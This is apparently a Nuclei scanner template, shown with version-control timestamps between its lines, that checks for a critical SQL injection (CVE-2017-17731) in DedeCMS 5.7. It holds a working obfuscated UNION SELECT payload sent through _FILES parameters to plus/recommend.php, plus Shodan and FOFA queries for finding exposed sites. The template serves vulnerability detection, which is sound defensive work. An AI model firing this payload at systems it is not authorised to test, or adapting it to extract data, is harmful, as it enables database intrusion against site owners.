2023-04-28 00:53:23 +00:00
|
|
|
id: CVE-2017-17731
|
|
|
|
|
|
|
|
info:
|
2023-05-05 06:13:29 +00:00
|
|
|
name: DedeCMS 5.7 - SQL Injection
|
2023-04-28 00:53:23 +00:00
|
|
|
author: j4vaovo
|
|
|
|
severity: critical
|
2023-05-02 10:59:15 +00:00
|
|
|
description: |
|
|
|
|
DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
|
2023-04-28 00:53:23 +00:00
|
|
|
reference:
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17731
|
|
|
|
- https://blog.csdn.net/nixawk/article/details/24982851
|
|
|
|
- https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cwe-id: CWE-89
|
|
|
|
metadata:
|
|
|
|
fofa-query: app="DedeCMS"
|
2023-06-03 18:56:35 +00:00
|
|
|
max-request: 1
|
2023-04-28 00:53:23 +00:00
|
|
|
shodan-query: http.html:"DedeCms"
|
|
|
|
tags: sqli,dedecms
|
|
|
|
|
|
|
|
variables:
|
|
|
|
num: "999999999"
|
|
|
|
|
|
|
|
http:
|
2023-05-02 10:59:15 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2023-05-02 11:09:12 +00:00
|
|
|
- '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'
|
2023-04-28 00:53:23 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2023-05-02 10:59:15 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
2023-04-28 00:53:23 +00:00
|
|
|
words:
|
|
|
|
- '{{md5({{num}})}}'
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2023-05-05 06:13:29 +00:00
|
|
|
- 200
|